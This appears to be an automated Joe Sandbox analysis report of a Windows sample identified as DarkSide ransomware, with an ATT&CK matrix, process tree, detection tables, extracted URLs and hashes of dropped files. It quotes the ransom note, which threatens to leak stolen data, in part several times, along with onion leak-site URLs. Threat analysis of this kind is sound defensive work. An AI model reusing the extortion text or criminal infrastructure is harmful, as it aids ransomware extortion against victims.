                      Domain Accounts | Service Execution 12 | Windows Service 14 | Access Token Manipulation 2 | Software Packing 2 | Security Account Manager | File and Directory Discovery 12 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Registry Run Keys / Startup Folder 1 | Windows Service 14 | DLL Side-Loading 1 | NTDS | System Information Discovery 23 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Process Injection 12 | Masquerading 11 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder 1 | Valid Accounts 2 | Cached Domain Credentials | Security Software Discovery 31 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Virtualization/Sandbox Evasion 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 2 | Proc Filesystem | Process Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 12 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

                      Behavior Graph

Behavior Graph ID: 411752
Sample: P3FwQWmwUM.exe
Start date: 12/05/2021
Architecture: WINDOWS
Score: 92

Signatures attached to the start node:

• Antivirus / Scanner detection for submitted sample
• Multi AV Scanner detection for submitted file
• Found ransom note / readme
• 4 other signatures

Process tree (graph node ids in brackets; the trailing numbers on a process node are the graph's created-registry-value and created-file counts):

• [2] start -> [7] svchost.exe (started)
    • signature: Changes security center settings (notifications, updates, antivirus, firewall)
    • [7] -> [17] MpCmdRun.exe 1 (started)
        • [17] -> [21] conhost.exe (started)
• [2] start -> [10] P3FwQWmwUM.exe (started)
    • signature: Contains functionality to change the wallpaper
• [2] start -> [12] P3FwQWmwUM.exe (started)
    • [12] -> [19] P3FwQWmwUM.exe 2 1 (started)
        • [19] -> [23] P3FwQWmwUM.exe 35 (started)
            • [23] -> [26] C:\README.2c9ccbf3.TXT, ASCII (dropped)
• [2] start -> [14] 9 other processes
    • [14] -> [28] 127.0.0.1 unknown unknown (DNS/IP info)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
P3FwQWmwUM.exe | 46% | Virustotal | -
P3FwQWmwUM.exe | 62% | ReversingLabs | Win32.Ransomware.DarkSide
P3FwQWmwUM.exe | 100% | Avira | TR/Crypt.XPACK.Gen
P3FwQWmwUM.exe | 100% | Joe Sandbox ML | -

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
3.2.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.0.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.P3FwQWmwUM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe (4 entries)
http://darksidedxcftmqa.onion/blog/ | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe (4 entries)
http://darksidfqzcuhtk2.onion/K71D6P8 | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe (4 entries)
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O7h | 0% | Avira URL Cloud | safe
http://darksidedxcftmqa.onion/blog/article/ | 0% | Avira URL Cloud | safe
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9D | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe (3 entries)
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbr | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe (3 entries)
https://activity.windows.comr | 0% | URL Reputation | safe (3 entries)
https://%s.xboxlive.com | 0% | URL Reputation | safe (3 entries)
http://ocsp.sectigo.com0% | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe (3 entries)
https://dynamic.t | 0% | URL Reputation | safe (3 entries)
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe (3 entries)
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wk | 0% | Avira URL Cloud | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe (3 entries)

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://ocsp.sectigo.com0 | P3FwQWmwUM.exe | false | URL Reputation: safe (4 entries) | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
http://darksidedxcftmqa.onion/blog/ | P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmp | false | - | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmp | false | - | high
https://torproject.org/ | P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, P3FwQWmwUM.exe, 00000004.00000003.474064504.0000000002B42000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.332042030.00000000007D8000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.dr | false | - | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmp | false | - | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | P3FwQWmwUM.exe | false | URL Reputation: safe (4 entries) | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmp | false | - | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmp | false | - | high
http://darksidfqzcuhtk2.onion/K71D6P8 | P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmp | false | - | high
https://sectigo.com/CPS0D | P3FwQWmwUM.exe | false | URL Reputation: safe (4 entries) | unknown
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O7h | P3FwQWmwUM.exe, 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://darksidedxcftmqa.onion/blog/article/ | P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
http://www.bingmapsportal.com | svchost.exe, 0000000C.00000002.312755628.000001F743213000.00000004.00000001.sdmp | false | - | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmp | false | - | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9D | P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | P3FwQWmwUM.exe | false | URL Reputation: safe (3 entries) | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000C.00000003.312282264.000001F743245000.00000004.00000001.sdmp | false | - | high
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbr | P3FwQWmwUM.exe, 00000004.00000003.296079532.0000000002AB0000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.dr | true | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmp | false | - | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 0000000C.00000003.312282264.000001F743245000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmp | false | - | high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | P3FwQWmwUM.exe | false | URL Reputation: safe (3 entries) | unknown
https://activity.windows.comr | svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 0000000C.00000002.312755628.000001F743213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmp | false | - | high
https://%s.xboxlive.com | svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
http://ocsp.sectigo.com0% | P3FwQWmwUM.exe | false | Avira URL Cloud: safe | low
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | P3FwQWmwUM.exe | false | URL Reputation: safe (3 entries) | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | svchost.exe, 00000006.00000002.522409527.0000020C7BB50000.00000002.00000001.sdmp | false | - | high
https://dynamic.t | svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | P3FwQWmwUM.exe | false | URL Reputation: safe (3 entries) | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmp | false | - | high
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wk | P3FwQWmwUM.exe, 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmp | false | - | high
https://activity.windows.com | svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmp | false | - | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmp | false | - | high
https://%s.dnet.xboxlive.com | svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmp | false | - | high

                                                                                      Contacted IPs


                                                                                      Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious

                                                                                      Private

                                                                                      IP
                                                                                      127.0.0.1

                                                                                      General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 411752
Start date: 12.05.2021
Start time: 06:15:33
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: P3FwQWmwUM.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.rans.evad.winEXE@19/47@0/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 89%)
• Quality average: 75.8%
• Quality standard deviation: 33.2%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 104.43.139.144, 23.218.208.56, 204.79.197.200, 13.107.21.200, 20.82.210.154, 2.20.143.16, 2.20.142.209, 92.122.213.194, 92.122.213.247
• Excluded domains from analysis (whitelisted): www.bing.com, au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, dual-a-0001.a-msedge.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      Time      Type             Description
                                                                                      06:16:36  API Interceptor  2x Sleep call for process: svchost.exe modified
                                                                                      06:17:55  API Interceptor  1x Sleep call for process: MpCmdRun.exe modified
                                                                                      06:18:05  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      No context

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      No context

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\2c9ccbf3.ico
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:MS Windows icon resource - 5 icons, 64x64, 32 bits/pixel, 48x48, 32 bits/pixel
                                                                                      Category:dropped
                                                                                      Size (bytes):34494
                                                                                      Entropy (8bit):3.274622648924063
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:gbjP3AlUfsjVX50pzKOMkbD0NY3dIZJJw:8jP3Aufsj7cOTkvIZJW
                                                                                      MD5:4F57D54D01CCBDAF3EBFAC3EC0AC3FD7
                                                                                      SHA1:BC529DC03674D08D64D8442C4E1D1A3E3464E953
                                                                                      SHA-256:28B6841AA125225CD01BE09FBD2F1D7B3C2102D9FFC7DC8546700E67C2A6E3BC
                                                                                      SHA-512:BA9F779C0066EBEC8E555276AFBC862456B083138F8EB512CAE50B431EBE32C74C0A5EFB4E99F995BCFCBAEC2B71E242984FDD5084561940E741F1CAC1D6C246
                                                                                      Malicious:false
                                                                                      Preview: (binary content, omitted)
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4096
                                                                                      Entropy (8bit):0.5959966958795487
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:b7ZcE2k1GaD0JOCEfMuaaD0JOCEfMKQmDtc9tAl/gz2cE0fMbhEZolrRSQ2hyYI8:b7ZTGaD0JcaaD0JwQQtatAg/0bjSQJ
                                                                                      MD5:B04CC4E70792D21CB512B58CAB471DF0
                                                                                      SHA1:47CD1EFFD275EE99A5382319F44966938011144B
                                                                                      SHA-256:3887596A218A6744507CC827267D24292A690345BA24865FF04D0A9A3C2E6D29
                                                                                      SHA-512:2D2E82A381D641DD0B57AEA23CA24AADF218DD7CE0B6F10CCF8FC5515EF01AA05B6D599A3E40CB5E56A9BABB767D086D6711083FBDCD0D8AD024FC21C2247AC9
                                                                                      Malicious:false
                                                                                      Preview: (binary content, omitted)
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0df7824b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.09569855989648687
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fSZGzwl/+hsNlsRIE11Y8TRX6NyyKJSZGzwl/+hsNlsRIE11Y8TRX6NyyK:yG0+k6O4bl6XK4G0+k6O4bl6XK
                                                                                      MD5:FD1613636B5C1F0359604709CF7E28D7
                                                                                      SHA1:0DD34912978CFECFC99094B13606F328245AD3BD
                                                                                      SHA-256:2C7D8799130967A0D07A9AA42F392C464F8B1BCA5A8E8F6638F62AFE15A08648
                                                                                      SHA-512:CDAF197A0E12CB998F31C0AEADE714A867F6A4F48018B724A584D6850F809B81F884DBC6BF99221409AA69670C59269B06E6B2D4AF56E7735F2FE8547CA58539
                                                                                      Malicious:false
                                                                                      Preview: (binary content, omitted)
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8192
                                                                                      Entropy (8bit):0.10955675807642352
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:A09EvB6hl/bJdAtiZIhXall:A5Kt4re
                                                                                      MD5:5DB88030C44E742C58C02D9BD3CAED65
                                                                                      SHA1:985AC0D2D0CEB93C055B8FCB35CA703DD4AF7B75
                                                                                      SHA-256:65783AEA2F43380F918BC71664CF21305EFDE5D453D7A54BBFA76D8887C41FD3
                                                                                      SHA-512:4ADFFCBAC07EEABF953E7351DAD655AA97D04E77CC2F5A6F77D3DE37A3B31C2CC21518C07AA59619621B660426B7FCFD75075B6EA8B2E01F1277E20788A31231
                                                                                      Malicious:false
                                                                                      Preview: (binary content, omitted)
                                                                                      C:\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
